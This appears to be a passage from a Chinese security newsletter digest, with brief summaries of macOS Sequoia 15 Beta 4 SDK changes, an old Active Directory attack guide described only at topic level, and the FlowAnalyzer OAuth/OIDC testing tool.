	<p>🏷️: SQL注入, 网络安全, 技术</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x06
			 macOS Sequoia 15 Beta 4 SDK更新与SwiftUI改进</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">macOS Sequoia 15 Beta 4 发布说明详细介绍了 Sequoia 15 Beta 4 版本的 macOS SDK 更新，包括 SwiftUI 的新特性、bug 修复以及开发者需要注意的行为变化。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.525" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=252bb3c8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZmwZuG4Yf5KAoarDAr2Ip466aaTb55ObfhsezqqMVtMicOfmdqxfTic8IsQWFYMrIlPVZjIh4BX72Dg%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">「编者注」:18不想了，先等一波iOS 17的巨魔🤣</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">iOS 18/macOS 15 Beta 4 出现 iBoot 未加密漏洞</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmwZuG4Yf5KAoarDAr2Ip468HZhTEpUFibfOv4My4SJudmibGlgdnLbQW822ibyACF9IfHt2ZGscQJtg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmwZuG4Yf5KAoarDAr2Ip468HZhTEpUFibfOv4My4SJudmibGlgdnLbQW822ibyACF9IfHt2ZGscQJtg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=1522188212851112"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">SwiftUI 的进一步增强：Sequoia 15 Beta 4 版本继续增强 SwiftUI，提供了更多的 UI 组件和功能，以及更好的开发者体验。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">兼容性和行为一致性的重视：苹果公司对于新旧版本之间的兼容性和行为一致性表现出了高度重视，通过详细的发布说明帮助开发者平滑过渡。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">性能优化和 Bug 修复：Sequoia 15 Beta 4 关注了应用程序的性能优化和 Bug 修复，以提升用户体验和开发者的开发效率。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">开发者需要关注的变化：开发者需要注意新版本中的行为变化，如默认尺寸、导航行为和视图生命周期等，以确保应用程序的正确运行和用户体验。</section></li></ul>
	<br/>
	<p>🏷️: macOS, SwiftUI, 软件开发, SDK更新, 操作系统</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x07
			 攻击活动目录：从0到0.9</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">网页主要介绍了如何攻击Active Directory环境，包括了对Active Directory的基本概念、结构、用户管理、组管理、计算机管理、服务管理以及数据库的详细信息，并且提供了一系列的攻击技术和方法，如密码 hash的提取、Kerberos票证的利用、信任关系的滥用、域控制器的嗅探等。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.9704301075268817" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="744" src="https://wechat2rss.xlab.app/img-proxy/?k=9c39fac1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46Z7v4eROoz8riaTo4XdnZtVE4whaB9mAKM8T0q9D9rwMhubjQg0Pichwg%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.6355029585798817" data-w="845" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=0ba0e303&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46Tibu2mOaPR22SlIcymTldSkTM9gQsUdkQP2fkfjsVMx0L4IMjb62cwA%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.472" data-w="625" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=83514027&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46TsI9fxSFKvbPeMS59GjibxUUXqGe1mYWCZsgibTVPDHUGaE1T0X5toVA%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">「编者注」:历史老文，今天有人讨论，扫盲101类</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">免费学习 Active Directory 攻击技巧</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46eJygXvmvbP63tf68KPUxO7MNs2I9fOhl5OJakVOqkRTaKmIvUcrq7Q/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46eJygXvmvbP63tf68KPUxO7MNs2I9fOhl5OJakVOqkRTaKmIvUcrq7Q/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=8855411548554412"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Active Directory是企业网络安全的核心，其设计和配置对网络安全至关重要。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">攻击者可以通过了解Active Directory的结构和组件来识别关键目标，如域控制器、高权限用户和敏感组。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">密码哈希和Kerberos票证是攻击者获取对域内资源的未授权访问的关键资产。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">信任关系和服务 principal name（SPN）可能成为攻击者横向移动和提升权限的途径。</section></li></ul>
	<br/>
	<p>🏷️: 活动目录, 攻击, 渗透测试</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x08
			 FlowAnalyzer：OAuth 2.0和OpenID Connect流分析工具</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">FlowAnalyzer 是一个帮助理解和测试 OAuth 2.0 授权流程及 OpenID Connect（OIDC）的工具。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.25" data-w="800" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=3739fb0e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46456CfibZZ1dxgiczFiatGM6lWxFSzC2aulKA9KRMP0KUT6WYEMc7gYvCA%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
